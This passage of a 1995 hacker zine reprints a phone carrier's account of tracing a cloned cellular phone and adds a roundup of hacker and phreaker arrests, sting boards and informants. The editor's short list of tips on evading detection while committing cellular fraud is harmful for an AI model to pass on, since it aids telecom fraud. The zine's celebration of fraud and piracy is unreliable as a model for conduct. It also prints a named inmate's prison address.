______ ______ _____________ ____ ___ ______ / ____|\ / \ /____ ____/\ / | \ / / | / \ / / ____\| / __ |\ \_/ /\____\/ / | / / / / __ |\ / / / / /__/ / | / / / / /| |/ / / / /__/ / | / /__/______ | / / / / / / / | / / | / / |____________|\ |\_____ / / /__ / / /___/ / |___/ / |\_____ / / |_____________\| \|____| / \__\ / |___ |/ |___|/ \|____| / ____ / \ --- / \ \ __ / /\ \ \ \ _/______|_/ / / / \ | | / / / / | ---\( |/ / / / | \|\(/ \(/\(/ | | / / / \ / / \ ___/ / / / Communications of The New Order Issue #6 Fall 1995 "There is nothing more difficult to take in and, more perilous to conduct, or more uncertain in its success, than to take the lead in a new order of things." - Niccolo Machiavelli' Cavalier........"I hacked codes to get warez for free drugs." Dead Kat........"I have non-hacker friends but fuck if I keep in contact with them, they don't have k0d3z." Disorder........"US West knew we were getting their stuff, they just didn't know we were on the deferred payment plan." Edison.........."I said fuck you cop.. well I wish I had said that." Major..........."SUNOS... the swiss cheese of unix." Voyager........."I don't think money is as powerful as fear, but I have a day job." Special Thanks: Gatsby, Mark Tabas, The Doktor, Presence, Demonika, Rage (303), Invalid Media, Deathstar, KevinTX, Intrepid Traveler, Plexor, yLe, Drunkfux, Damien Thorne, Brownstone, Storm Bringer, Neophyte, Ole Buzzard, AntiChrist, Redboxchilipepper, El Jefe, Jupiter, Captain Hemp. Good Luck: Mark Tabas, Gatsby, Kevin Crow, Dispater, St. Elmo, Zibby, Dr. Delam, Phantom Phreaker, Purple Condom, Manson, BernieS, Kevin Mitnick, Alphabits. ========= __/\iNTRo/\__ CoTNo is a 'zine of the computer underground of the 1990's. It is written for H4Qu3r's and pHR3aCK3r's of intermediate to beginning experience. All the information published herein is as accurate as possible and pertains to techniques and devices that actually work. We do not publish any article that is not of an H/P nature. If you wish to comment on or contribute to CoTNo, email one of us, or catch one of us on the iRC or try to catch us in your local Telco dumpster. Ahem... This issue is dedicated to all of our good friends who have recently been busted. In fact, the last three issues are dedicated to them, since there have been more people busted in the last twelve months then at any time since Sundevil. In issue four I espoused my opinion that there was a federal conspiracy at work with paid informants masquerading as our friends. Last issue I gave detailed information on one of our own busted members, John Falcon. In this issue there will be information you can use to help keep yourself out of jail. In this issue, Disorder has compiled detailed information on the busts of lasts twelve months. Each bust that we heard of is detailed with names and events. Hindsight is always clearer than foresight, so hopefully you can learn from these busts how to avoid a similar fate. Also in this issue, I am releasing confidential information on how cellular fraud is prevented. The information is straight from a national cellular carrier and details exactly how the telcos detect, trace, and bust cellular abuse. This information should convince you to take the utmost precautions if you are experimenting with cellular technology. Lastly, John Falcon sent me an article on what to do if you do get busted. I think this is the first H/P article ever written from jail! The following information was an actual article from Cellular One that was distributed to some of their employees. This article was not edited in anyway, and contains the best information I have ever seen on how cellular fraud is prevented. If you are participating in cellular phreaking, I recommend that you read this article very closely and take it as a warning from the Cellular Telephone industry. They are getting serious about halting cellular fraud, and for good reason. In New York for instance, often there are more fraudulent cellular calls than legitimate ones on any given day! The Fedz are on their side too. As you may already know, the Fedz ran an underground BBS for 8 months this year just to catch Cellular Fraudsters. In fact, Kevin Mitnick was recently busted using the same methods described in the following article. The article, dated February 1995, follows: A team of five Cellular One employees helped stop cellular fraud in Denver last week. To protect both our employees and future investigations, Cellular One team members names will not be released. California officials tracked a suspect from the Los Angeles area using a cloned cellular phone to Denver early last week and asked Cellular One for assistance in locating this suspect. With the cloned cellular phone number and a number the suspect repeatedly called in California, the five Cellular One employees and both local and California law enforcement agents began tracking the whereabouts of the suspect through the pattern of his cellular phone calls. Using AMA searches, RFCALL Trace, directional antennas, an IFR 1500, an RSAT Plus, and hours of labor, the Cellular One team identified the suspect's calling patterns. An AMA search is a record of an individual cellular phone number's calls. The cellular number is input along with the parameters for the search - start and finish date and time - and a log is printed which shows each individual call made by that cellular number. This tool is used generally within three days of the calls which you wish to observe. AMA searches were compiled over several days to document the calling patterns of the suspect. While the AMA searches show the past calling pattern, when attempting to capture a cellular fraud suspect, real time tools must also be used. The Cellular One team used RFCALL Trace which tracks similar information as an AMA record with the exception that the information can be collected with only a 10 second delay from real time. RFCALL Trace also tracks the individual radio in use, any handoffs, and the signal strength of the cellular call. Law enforcement agents issued a subpoena to Cellular One for all information regarding the fraudulent cellular phone number's activity on our system. Most of the fraudulent phone calls were being placed between 10am and midnight. Tracking which cell sites, cell faces, and radios the suspect's calls set up on identified a small geographical area as the suspect's base of action. Once an area had been established, one team member drove this area using an RSAT Plus, an IFR 1500, and a directional antenna (all basic cellular test equipment used in system optimization) to pinpoint the suspect's location to a specific apartment complex. This team me tracked the calls made by the suspects's cellular number and, watching the faces serving the calls and he handoffs made by the system during the suspect's calls, he was able to narrow down the location from which the calls were made to a specific side of one apartment building. The law enforcement agents, equipped with their own brand of cellular fraud- busting tools, asked if the Cellular One team could identify the actual apartment within the building where the calls were being placed. A narrowband directional antenna was set to the transmit frequency of the cloned phone. One problem was that with each new phone call, the frequency being tracked changed. The suspect made short calls, most around one minute, with the longest between three to five minutes. Using the directional antenna and resetting the frequency with each new call on the cloned phone, the Cellular One employee identified a group of apartments within the building from which the cellular calls were being placed. Unfortunately, the suspect slipped out of the building before the specific apartment was identified. Again using RFCALL Trace, the Cellular One team logged the suspect's next phone call on a cell site near Stapleton Airport. Law enforcement was notified and kept aware of the phone calls as the suspect traveled throughout the system. It became evident that the suspect was moving back toward the apartment complex. Surveillance officers outside the apartment noticed three men enter just moments before the Cellular One team notified them that a call had been placed from the apartment. Within 20 minutes, the suspects again left the apartment. Denver Police began pursuit of the suspect and made the arrest. Five additional cellular phones were found in the suspect's apartment. It has not been determined if these phones are cloned. Although cellular fraud exists, it is possible to catch the criminals. Congratulations to our fraud busters! Cellular One asks that you keep this story confidential since the specifics of this and future investigations depend on our ability to catch the criminals in action. End of Cellular One Article. Pretty scary, huh? Cellular phreaking used to be considered pretty safe, but times have changed. The cellular phone companies are losing so much money on cellular fraud, that they have made busting the cellular hackers a priority. If you do commit cellular fraud, I suggest you use the following guidelines: 1. Never use the fraudulent ESN for over two weeks. 2. Change ESN's as often as possible. 3. Avoid creating a calling pattern with your fraudulent ESN. 4. Avoid using the fraudulent ESN from a stationary location. These tips could keep you out of jail! Because you cannot divert with a cellular phone (unless you are Kevin Mitnick) these precautions are necessary. As my friend John Falcon told me, "Its not worth doing time for silly phone shit." He's right. H/P is fun, but anyone who has gotten busted will tell you the same. But if despite these warnings, you still decide to cellular phreak, just make this quote from Gatsby your mantra, "An ESN a day, keeps the federals away." |>ead|========= -= Operation Phundevil =- by DisordeR[TNo] With all the busts happening in the past year, and a lack of information in the scene regarding who got busted when, and for what, I decided to put this article together. After working on this for a while, I realized that not only was it a little difficult in finding bust info, but half of the little you found was bullshit. The information in the following article is as accurate as I can find. With all the different accounts of what happened, different nicknames, different NPA's, and pure stupidity out there, don't bet your life on the information contained within this article. The following sections give you some details about some busts, and RUMORS of others. I indicate which are rumors and which are legit. I utilized everything from BBS posts, to newspaper articles, to word of mouth. Thanks to those who helped me on this. And by no means is this NEAR complete... =-= "OPERATION CYBERSNARE: FEDZ = 1, PHREAKZ = 0" Main Thugs: Peter A. Cavicchia II - Special Agent in Charge Donna Krappa - Assistant U.S. Attorney in Newark Stacey Bauerschmidt - "Carder One" The Busted: Richard Lacap - "Chillin" - Katy, Texas: Accused of conspiring to break into the Portland, Oregon AT&T Wireless computers. Kevin Watkins - "Led" - Houston, Texas: Accused of conspiring to break into the Portland, Oregon AT&T Wireless computers. Watkins used the computer system of Embry Riddle University in Prescott, Ariz., to enter the McCaw computer, Secret Service Special Agent Stacey Bauerschmidt said in a sworn statement. Jeremy Cushing - "Alpha Bits" - Huntington Beach, California: Accused of trafficking in cloned cellular phones/equipment and stolen access devices (ESN/MIN Pairs). Frank Natoli - "Mmind" - Brooklyn, New York: Accused of trafficking in stolen access devices. Al Bradford - "Cellfone" - Detroit, Michigan: Accused of trafficking in unauthorized access devices. Michael Clarkson - "Barcode" - Brooklyn, New York: Accused of possessing and trafficking in hardware used to obtain unauthorized access to telecommunications services. Penalty: If convicted, defendants face maximum possible sentences ranging from 15 years for Cushing to 10 years for Bradford, Clarkson and Natoli and five years for Lacap and Watkins. Details: Starting in January, Stacey Bauerschmidt and other Secret Service agents in Newark, NJ, set up what is now called "an electronic chop shop" by the press. Stacey (in cooperation with a 'nameless informer' who will be mentioned later) set up a computer BBS called "Celco 51" with the intent of busting hackers and phreakers specializing in cellular phone fraud. For the first sixth months, the board operated using MBBS with four nodes. At any given time the board had an 800 re-route (not really) so that the users could call without any problem (ANI). To the credit of the agents in charge, the board did not allow just anyone access. The sysop (PMF) appeared to discriminate and only allow the 'elite' members of the H/P community on. With the illusion of security, the agents running the board could successfully monitor the users, and begin to make deals with the hackers. Stacey [Who went by 'Carder One'] continually asked members of the BBS if they were interested in selling ESN/MIN pairs [Used for cellular phone fraud]. These 'pairs' are considered 'illegal access devices' and are usually found in large enough amounts to consist of felonies. On top of the illegal access devices, Stacey was looking for people that were willing to sell illegal cloning equipment. This equipment consisted of devices used to get pairs, clone phones, and reprogram phones. The operation was very successful in many ways, notably the ability of the agents to mask the true nature of the board. For over eight months, Stacey and other agents monitored the board looking for any chance to prosecute any of the members. The sysop (PMF) continuously advertised the board to the members, as well as mailed and HARASSED members into calling more than they wished to (Entrapment anyone?). PMF was responsible for mailing members up to three times a day, message flooding people on IRC, and using other methods of harassment to get hackers to call. On top of the harassment, Carder One continuously asked for people to post 'pairs' as well as sell them in private. In a few cases, individuals would not have considered selling these pairs had the federal agents not harassed them so much. Ahem. "Cushing and five others were arrested in four states during a sweep last week by federal agents. Another 14 raids spread over eight states led to the confiscation of 31 computers, 65 illegally programmed phones and 14 "readers," devices used to illegally pluck cellular phone numbers and serial codes from cellular phone transmissions." [Wonder who's computer will run the next sting board?] "But because the alleged crooks posted phone numbers on the bulletin board indicating where they could be reached, the Secret Service was able to trace the calls, leading to the arrests." [Need we emphasize the importance of Diverting any more?] "But officials said this case represented the first time that the Secret Service had created an entirely new computer bulletin board..." [Couldn't bust any warez kiddies recently...] [Watch out kiddies... They are using more than 'questionable' methods of busting hackers and phreaks these days. If you haven't met someone, be careful of what you post on their systems.. many people thought PMF was cool until he NARKED on everyone that he could.] =-= "ANARCHIST BUSTED FOR WRITING MAGAZINE" From: The Anarchives In early march of 1995 I was arrested for "Unauthorized Use Of A Computer". Three large, white, plain-clothes detectives from 52 division in downtown toronto came to my house, promptly arrested me, took me to a holding cell, and conducted a strip search (looking for codes I guess). I was held in custody for four hours (7:30 pm to 11:30 pm), and released as a result of substantial protest made by friends and family at the sergeants desk. I was being accused of breaking into the computer systems at the University Of Toronto for the purpose of publishing "Anarchist newsletters". The sysadmin of ecf.utoronto.ca, one Professor Jack Gorrie , saw someone on his system publishing Anarchist materials, assumed I was a malicious "hacker", turned over all records of my email, news posts, key strokes, you name it, to the police at 52 division. The police realizing how dangerous these "hacker anarchist" types are, had to come to my house to cuff me, bring me down, and strip search me. I was to face trial for a possible six months in prison, just for exercising my democratic rights and responsibilities. Of course the end result was that the charges were dropped, although this was not until several months later (sept 7, 95), after several appearances in court, and after my agreeing to pay $400 to the skule. =-= "FEDS SAY HACKERS CRACKED INTO TOWER CREDIT CARD RECORDS" by, Denny Walsh From: The Sacramento Bee Saturday Sept. 16, 1995 Two talented Berkeley hackers were charged Friday with computer- age crimes against a Tower Video rental store in Sacramento, federal authorities said, in large part because they went up against Tower's even more talented electronic security corps. When authorities raided their apartment last month, Terry Patrick Ewing, 21, and Michael Yu Kim, 20, had the credit card numbers of 2,000 Tower customers, federal prosecutors said. According to a federal grand jury indictment, Ewing and Kim used their personal computer to break into a system know as TRON, owned and operated by Tower's West Sacramento-based parent, MTS Inc. Kim and Ewing are charged in a three-count indictment with conspiracy, fraud and the unauthorized destruction of computer data. The prosecutor said the pair are not in custody and will be allowed to surrender next week. He said he does not see them as flight risks. =-= "KEVIN MITNICK BUST - HIGHLIGHTS" From Multiple Sources If you want more details, read the hundreds of articles about this story. Also, read the Phrack 47 editorial pertaining to this subject. Kevin Mitnick (31) -One of the first indicted under Computer Security Act of 1987 -Search began in November 1992 -Mark Seiden (expert in firewalls) discovered that someone had obtained all of Netcom's credit card numbers for 20,000 online subscribers. -Stole files from: Motorola, Apple, Netcom, and more. -Mitnick used the Well as a repository for files he stole from computer security expert Tsutoma Shimomura. -After raping Tsutoma, he used Bruce Koball's account to transfer proprietary software from Motorola, NEC, Nokia, Novatel, Oki, Qualcomm, and other cell manufacturers. -Shimomura concluded that it was Mitnick, and that he was operating through cellular, from Raleigh, NC -Mitnick was bouncing his calls through GTE Switches, local switches, and a few types of cellular switches, and utilized Netcom's dialins. -Lived in Player's Court, a 12-unit apartment building in suburb of Duraliegh Hills, three miles from the airport. He lived in Apt 202. -Until a week or two before he was arrested, FBI surveillance agents in Los Angeles were certain that 'the intruder' was somewhere in Colorado. -FBI arrested him at 24 hour stakeout -Arrested in Raleigh, N.C. at 1:30 a.m. =-= "PHREAKS BUSTED IN NY... MORE TO COME" "Ok all Listen up and listen good. resistance is down. Maybe permanently. Most of you prolly haven't heard yet, but there have been major busts going around. ... Today alone i found out that Neon Samurai, Tokien Entry, and Hellfire have been busted. ... that they even busted craig neidorf(knight lightnig) again. More bad news. If you are on UPT(unphamiliar territory) or Cellco 51, stop calling. The SS who raided hellfire slipped a bit and bragged about being on those boards. Hellfire said the feds were mostly interested in credit cards, VMB's, and Cell phones. They are looking to bust for cellular, VMB's and credit cards... Tokien entry i found out has been in jail for 2 days! Neon Samurai was busted for credit cards and also for telco equipment that the nynex people said was worth 50,000. " PMFs (Narc) reply: "dude, this is utter shit and i expect u to post this reply for me seeing as i ain't on that bbs.. Hellfire gave up his accounts to UPT and my bbs among others, he was the only person busted and nothing to do with his busts was EVER mentioned on my board. He doesn't even get involved in cellphones, he was busted coz he and every other person busted used 1 800 CALL ATT from his house.. what a bunch of lamers... I don't even know who wrote that next but i would like to find out.. probably the guys from NYHE..." [Ironic isn't it!] =-= "ALPHABITS ORIGINAL BUST LAST YEAR" Caught alphabits on irc lastnight and he said: but I got sent to prison 7 months ago, and lost contact *** According to different people, he was busted for check fraud and/or credit fraud and/or cellular fraud. Unfortunately, I will not be able to talk to him until after this article. =-= "SYNCOMM, MEMBER OF S.O.B (SERVANTS OF BABUSHKA) RAIDED" From another group member: Syncomm was talking on the phone.. the day before Master of Reality got busted... so MOR, Greg and equinox were sitting there chatting away when a load of federal agents and some local police busted down his door. He dropped the phone and all they heard was a rustle of papers .. then a "Secure that paper!" then a click.. They put a shotgun to his head and said "Hello Syncomm". They said he was the leader of S.O.B. an international terrorist organization. Then again they thought that Crypt Keeper and MOR were also the sole leader of SOB ... So then they put a knee to his back and handcuffed him . They proceeded to interrogate.. and at one point this one agent tried to seduce him into talking .. He was finaly was lead outside when his neighbor walked up to them and handed them all of Greg's notes, etc.. that greg had asked him to stash.. Greg then threatened his neighbors life.. and was led off to holding... were they produced "A big fucking printout" that apparently detailed Greg's activities.. they nailed him for hacking UC and then accused him of crashing their systems.. Along with criminal tools and some other offenses.. =-= "FBI REVEALS ARREST IN MAJOR CD-ROM PIRACY CASE" SOFTWARE CRACKDOWN - Two Canadians were arrested in a blitz that has software companies upset to see piracy extending into the CD-ROM format. From the Associated Press, Saturday Dec 24 1994 BUFFALO, New York - The FBI has arrested a Canadian father and son in what is believed to be the first major case of CD-ROM piracy in the United States. Agents said Thursday they seized 15,000 counterfeit copies of the popular CD Rom games REBEL ASSAULT and MYST that were being sold at 25% of retail value. PETER MISKO, 63, of Mississauga, Ontario, and his son, BRUCE MISKO, 36, of CHICAGO were arrested in Buffalo and charged with felony copyright infringe- ment. The counterfeit goods were recovered in a Niagara Country warehouse authorities said. The FBI told the Los Angeles Times that additional warrants were served in INDIANA and NEW HAMPSHIRE as part of a crackdown on retail stores selling the illegal software. MORE ARRESTS ARE EXPECTED. =-= "MULTI-COUNTRY EFFORT CRACKS COMPUTER RING" TORONTO - Canadian, US and European investigators have cracked a ring of computer hackers who allegedly stole about $5 million US$ by breaking into the computers of phone companies and other firms. The 12 hackers who met over the Internet, used coding and call switching to conceal the transfer of funds, codes and communications. RUDY LOMBARDI, 22, of MISSISSAUGA Ontario PLEADED GUILTY on Tuesday, June 27 1995. He got 90 days in Jail and 100 hours of community services for HELPING the RCMP with their investigation - instead of at least a one year jail sentence. =-= "RUMORS FROM 914" There has been a huge chain of busts in 914. Apparently, GANGSTER, who ran a board in 914 called 'Bamboozie Dimension' was busted. Rumor goes on to say that he was 'fucking around with CC's' which led to the bust. =-= "WAREZ BUSTS IN 510" The Sewer Line BBS in 510 met trouble on December 11th due to the distribution of console warez (from various posts). Rumor also has it, that a user on the board going by ROCK'N was in fact a sega representative, and narked on the sysop for his activities. =-= "214 BUSTS" During August of '94, several boards (mostly warez/ansi affiliated) were raided by the FBI. The busts occurred in the Dallas/Ft. Worth area, the list follows: Agents of Fortune [409] (Sysop: Butcher [LEGEND]) Suburbia [214] (Sysop: The Chairman [RZR], The Network [214] (Sysop: Masterblaster) The Depths [214] (Sysop: Maelstrom ex-[RZR/iCE]) Elm Street [214] (Sysop: Freddy Krueger) User to User [214] (Sysop: William Pendergast) =-= "PHILLY 2600 MEETING" From recent posts and word of mouth, the Philadelphia 2600 meetings are having a hard time making it past 5 minutes. Apparently, local police in coordination with mall rent-a-cops [joining of forces there], are kicking hackers and phreakers out of their meeting place based on charges of loitering and conspiracy [to do what?! Assemble?]. Currently, police are threatening to break up meetings, and/or jail participants for the two reasons cited above. =-= "FEDZ BUST KID IN MINNESOTA" November '94, a 15 year old in Minnesota had a pleasant visit by federal agents. According to newspaper articles, the boy [unnamed in the article] was basing his hacks out of the Detroit Free-Net. "He used passwords to gain access to more than 10 computer networks from Detroit to Moscow". During his time on the Detroit Free-Net, he was said to have maliciously disabled enough of the system 'forcing' it to shut down. Currently, the boy is facing potential charges for using telecommunications devices to cross state lines, and felony charges for breaking into computer systems. Other favorite quotes from the articles about this case: "...hospitalized, possibly for psychological reasons, when police confiscated his computer modem and software programs Monday." "...said the boy appeared to fit the typical hacker profile: a 15- to 20-year-old male, many who have low self-esteem. 'He really could use a girlfriend instead of a computer' Grewe said." =-= "THE TROUBLES OF BERNIE S." Recently, a lot of press has been covering the story of 'Bernie S'. You can find more info about his bust on alt.2600 as well as several 'hacker' mailing lists. Here are some of the interesting quotes from one of those articles: "Ed Cummings, also known to many in cyberspace as Bernie SS was arrested on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale of a device to commit Telecommunications fraud charges. He is being held in Delaware County Prison in lieu of $100,000.00 Bail." His arrest took place at a local 7-11 where *15* police cars pulled into the parking lot. During the interaction with the officer, he told them 'no, you can't search my car', yet minutes later, he noticed an officer going through the contents of his car. Despite his protests, the officer removed several timing crystals, tone dialers, and a 'broken red box'. The following day, Bernie was at a friend's house when '8 to 10' plain clothed armed men burst into the house yelling 'freeze'. Minutes later he was being taken to jail in cuffs. He was not formally charged until his arraignment where his bail was set to 100,000 dollars because he refused to talk with the police without counsel present. "The Judge dropped the two unlawful use of a computer charges due to the fact that the evidence was circumstantial and the county had no actual evidence that Ed had ever used the computers in question. As of 3/27/1995 Ed Cummings is still in Delaware County Prison awaiting his trial." =-= "RUSSIANS ARREST 6 IN COMPUTER THEFTS" This article was taken from the Associated Press, Saturday Dec 24 1994 St. Petersburg, Russia, Sept 26 (AP) -- Russian police officers have arrested six more people in a $10 million computer theft from Citibank here, but the masterminds are said to remain at large. Several people have been arrested abroad and face charges in the United States, including Vladimir Levin, 28, reportedly the group's computer hacker. Citibank officials said they recovered all but $400,000 and upgraded the cash-management systems's electronic security after the theft. FT, Sept 21, 1995. Extradition in Citibank hacking case A British court yesterday approved the extradition to the US of Mr Vladimir Levin, the Russian science graduate accused of an attempted $10m (6.5m pounds) computer hacking fraud on Citibank. ... =-= "PURPLE CONDOM CAUSES TROUBLE" Purpcon recently had pleasant meetings with his Dean where he attends college after getting caught rewriting his magnetic student ID, so that others would get charged for his meal. :) =-= "CoTNo RUMORS" In past issues of CoTNo we have always said 'good luck to' people that have been busted (or said to have been busted).. Deathstar, AntiChrist (school admins?), Coaxial Mayhem, Maestro (Blueboxing?), Lucifer (still in jail?), Grappler (hacking), Jimbo (MCI Calling Card Fraud), Maelstrom, and Datastream Cowboy (hello CIA spooks), Merc, Crypt Keeper (keep reading), 602 crowd, and the 513 crowd. At the request of some of the above, I can't go into details on their busts. =-= "JOHN FALCON BUSTS" Since rumors about his bust have been running rampant on the 'Net', here are the facts about the bust... for more info, and JF's reply to the rumors, read CoTNo 5. Common myths of my arrest: 1 - The FBI/NSA cracked my hard drive and read all my encrypted mail. 2 - Mr. Falcon left his secring.pgp on his system. 3 - FBI/NSA read the RSA encrypted data. 4 - My conviction was because I was a hacker. Let me go over my conviction: Count 1: Theft of Government Property - How they caught me: Narc Count 2: Fraudulent use of an Access Device - How they caught me: Narc Count 3: Fraudulent use of a Computer - How they caught me: questionable Count 4: Fraudulent use of an Access Device - How they caught me: Narc If you would like to get in contact with JF, here is his info: email: jfalcon@ice_bbs.alaska.net snailmail: Don Fanning #12617-006 3600 Guard Road Lompoc, CA 93436 =-= "EPSILON, DAMIEN, SHOCKWAVE (303)" From CoTNo 3 (Read there for full story) Three Colorado teen-agers are suspected of setting up an elaborate computer- hacking system that tapped into a long-distance telephone company and stole secret access codes (k0dez!). Police arrested Kevin Wilson (Damian), 18, of the 7400 block of South Gallup Street in Littleton, and two juveniles (Epsilon and Shockwave) from Jefferson County in the alleged scheme. =-= "INTERVIEW WITH A CRYPTKEEPER" ck: I only got busted last February (1994) for hacking dis: I heard you got hit twice.. once last year, and once a lot more +recently.. CK: nope, I moved, I didn't get busted. I only got busted last year, once, that's it. And it wasn't real serious.. not like cellphone/money laundering..just some inet hacking. I got busted for hacking the University of Cincinnati and a few other things on the net.. they traced me through a PBX.. they were serious. They thought I was a spy. they were pissed to find out I was just a 16 year old. dis: hmm... bad.. did they just search/seize or what? ck: search/seized my computer.. I eventually got most of my stuff back (the computer, monitor, and keyboard) and had to spend 10 days in juvenile thats about it. oh.. and a big pain in the ass too of course not bad at all.. dis: anything else? ck: and tell them I was only busted ONCE, and it wasn't all that serious. I don't have any plans to get back into the scene (it sux now), but I do enjoy hearing about it sometimes. =-= "FEDZ CATCHING ON TO CALLING CARD SKAMS" A $50 million telephone calling-card theft ring disclosed earlier this week by federal investigators is representative of the advanced types of scams that have emerged in the last two years as telephone companies have become better at ferreting out fraud. The Secret Service said Ivy James Lay, a switch engineer at MCI's network center in Charlotte, N.C., stole over 60,000 calling card numbers from MCI and other long distance companies, later selling them to 'band of computer hackers.' The estimated value of the cards lies near $50 million. The Secret Service (which investigates fraud like this) claims this to be the largest case of calling card theft to date. =-=-= "SOME OF THE INTERESTING FACTS FROM A NEWSPAPER ARTICLE" Two computer hackers have been sentenced to fed. prison and an accomplice in Mn. awaits sentencing for his part in an international phone conspiracy. Ivey James Lay of Haw River, N.C., and Frank Ronald Stanton of Cary, N.C., were part of a hacker ring that stole credit-card numbers from MCI's Computer terminal in Greensboro. A third member of the ring, Leroy James Anderson, of Minneapolis pleaded guilty Friday in Minnesota to federal copyright violations. US District Court Judge James Beaty on Fri. sentenced Lay to tree years and two months in prison. Stanton, a 22-year-old student at Wingate College, was sentenced to one year. Anderson's sentencing is expected this summer. The conspiracy stretched into several European countries and cost long- distance carriers more than $28 millon, authorities said. Lay and Stanton pleaded guilty in Jan. to charges of fraud and trafficking in unauthorized access devices. The group bought and sold at least 50,000 numbers from 1992 until the summer of 1994, according to court documents. "What I did was very stupid," Stanton told Judge Beaty at his sentencing. "I'd like to go back and finish college." =-=-= "SHOCKER[303] GETS NAILED FOR CC'S" Damn, I got busted w/an illegal line tap! FUCK. No jail, just major phone bills! They are gunna try to bust me w/Credit Card fraud too. I shoulda listened to you. Fuck me. Got my mac taken away, I am writing this from a friends, I am not supposed to be here either, but hell, I got everything taken away, life sux shit, so do the gawd damn cops. Anyways, um, I'll see what happens, I'll call you sometime if I can get to the phone w/out my parents knowing. I can't have anything back until I pay for this shit, I think it is between $400 and $500, not sure, I already paid $170, but then I hafta fucking pay for MY PARENTS phone bill too, I rung the fuck outta that too. I got like, a felony and a second degree misdemeanor for that shit, they will drop the felony to a misdemeanor tho, I got charged with 'Theft' (felony) and criminal tampering (2nd degree misd.) SHIT TO HELL! Damnit. Anys, um, I'll see ya ok? Bye.. =-=-= "NYHE RUMORS" The New York Hack Exchange got busted for scams and cellfonez... (Someone mail me with more than a rumor please) =-=-= "WAREZ BOARD BUSTS AROUND THE COUNTRY" Bad Sector [BUSTED!] Beyond Corruption [BUSTED!] Jurrasic Park [BUSTED!] Lineup [BUSTED!] Main Frame [BUSTED!] Necronomicon [BUSTED!] No BBS [BUSTED!] The Notice [BUSTED!] On The World [BUSTED!] Perfect Crime [BUSTED!] Red Alert [BUSTED!] Restricted Area [BUSTED!] Rubbish Heap [BUSTED!] Skull Island [BUSTED!] Twins [BUSTED!] The Underworld [BUSTED!] Wolf Pack [BUSTED!] 15 Arrests 75 RCMP Officers Involved Removed at least 11 BBSs in one day Seized more than $200,000 in computer hardware Operation/Investigation lasted 6 months to 1 year April 12, 1995 Busts are localized in Montreal 514 NPA =-=-= "DUTCH HACKER ARRESTED" (from CUD 7.21): --------------Original message---------------- UTRECHT, THE NETHERLANDS, 1995 MAR 6 (NB) -- A Dutch student has become the first person to be convicted of computer hacking in the Netherlands. Ronald Oosteveen, a 22 year old Utrecht computer science student, was handed down a six month suspended sentence by magistrates last week, and was fined around $3,200 Oosteveen was accused of breaking into university, corporate and government computers, following his arrested in March, 1993, just three weeks after new Dutch anti-hacking legislation came into force. Oosteveen was caught in the act of trying to hack into the computer lines of a technical university in Delft near The Hague. He is also thought to have been responsible for previous hacking attacks which occurred before the new legislation came into force. =-=-= "THE EAST COAST" Tabas and Others Bust: According to Gatsby, the following were busted: Himself, Mark Tabas KC, Dispater, St. Elmos, Zibby, Rudy, Dr Delam, and Phantom Phreaker. (When I talked to him, he wasn't able to say much since it was the day after the bust) From empire Times: February 22, 1995 One thing all the people have in common: Southwestern Bell - or at the very least, the desire and ability to hack all the switches on the west coast. According to those involved, it goes way beyond switches... =-=-= "THE LAMACCHIA CASE" April 94: BOSTON, MA ...A federal grand jury returned a felony indictment today charging an MIT student in a computer fraud scheme resulting in the piracy of an estimated million dollars in business and entertainment computer software. United States Attorney Donald K. Stern and FBI Special Agent In Charge Richard Swenson announced today that DAVID LAMACCHIA, age 20, currently a junior at the Massachusetts Institute of Technology, was charged in a one count felony indictment with conspiring to commit wire fraud. The indictment charges that between November 21, 1993 and January 5, 1994 LAMACCHIA operated a computer bulletin board service that permitted users to copy copyrighted business and entertainment software without paying to purchase the software. The bulletin board was operated without authorization on MIT computer work stations and was accessible to users worldwide over the Internet... [Losses] are estimated to exceed a million dollars. [bahaha] =-=-= "BRITISH CALLING CARD BUST" British students have taken part in an alleged £65m computer fraud, involving the electronic theft of cards that allow users to make free telephone calls around the world. The hackers, one of whom was only 17 years old, were said to be earning thousands of pounds a month selling cards... Police found one teenager driving a new £20,000 car and with computer equipment worth £29,000 in his bedroom. AT&T officials also found a computer noticeboard called "Living Chaos" that was being used to sell the cards for up to £30 each. It mentioned Andy Gaspard, an employee of the Cleartel telephone company in Washington, whose home was raided. "We found 61,500 stolen cards ready to be sent to Britain," said Eric Watley, a secret service agent in the city. (The Sunday Times, 12 February 1995) =-= "TNO BUST OF 1994 - NEW NEWS" (my comments in [ ]) ROCKY MOUNTAIN NEWS (Front Page Headline) COMPUTER-CRIME RING CRACKED (Monday June 19, 1995) Quartet accused of hacking into Arapahoe college's system, inciting illegal acts. --------------------------------------------------------------------------- (Fourth Page Article) 4 ACCUSED IN COMPUTER HACKING CASE (By Marlys Duran) Suspects used equipment at college to incite criminal acts, officials say. Arapahoe County - Hackers calling themselves "The New Order" [Look Ma!] allegedly gained access to the Arapahoe Community College computer and used it to distribute tips on how to commit crimes. One man operated a computer bulletin board on which contributors from throughout the world exchanged how-to information on crimes ranging from credit-card fraud to high-tech burglary, authorities said. [Of course they fail to make that distinguishing gap that this board was NOT run off the Arapahoe system, and that it was a private BBS run out of his house] Computers were seized from the homes of four hackers, ranging in age from 15 to 21. Secret Service experts were called in to help crack the computer files. ['type filename.txt' is hard to crack eh?] Investigators found software for breaking passwords, lists of private passwords for several computer systems, instructions for cellular telephone fraud, private credit reports [Plural? Nope], lists of credit-card numbers and electronic manuals on how to make bombs and illegal drugs. [Yes, WE did the oklahoma bombing!@$!] In a 97-page affidavit detailing the 18-month investigation, investigator John Davis of the Arapahoe district attorney's office said that the hackers "operate with an attitude of indifference to the rights and privacy of others and have made efforts to teach and involve others in their criminal enterprise." [What the fuck does the government do everyday?] At the home of a Denver juvenile, authorities found hazardous chemicals and a book on how to make bombs. Nicholas Papadenis, 21, of Broomfield, and John Patrick Jackson, 19, of Thornton, were charged last month with committing computer crimes and conspiracy. Both are scheduled to appear in Arapahoe County Court on July 5. A decision is pending on whether to charge a 15-year-old Highlands Ranch youth and a 17-year-old Denver resident, chief deputy district attorney John Jordan said Friday. The affidavit says Papadenis, Jackson, and the youths hacked into the Arapahoe County Community College computer system, then used it to illegally distribute copyrighted computer games [Sorry, TNo doesn't have a warez division yet] and electronic magazines promoting fraud, theft, burglary and money-laundering. One of the magazines stated, "This publication contains information pertaining to illegal acts. The use of this information is intended solely for evil purposes." [Source: CoTNo 1!@#!@] Court documents do not indicate the hackers had political motives, and authorities declined to comment on the case. [Hackers with political motives would be way above their head.] A Denver University expert said computer criminals usually are not motivated by ideology. They usually are young people who are "doing it for the sheer challenge of it - just to demonstrate that they're able to do it," said Don 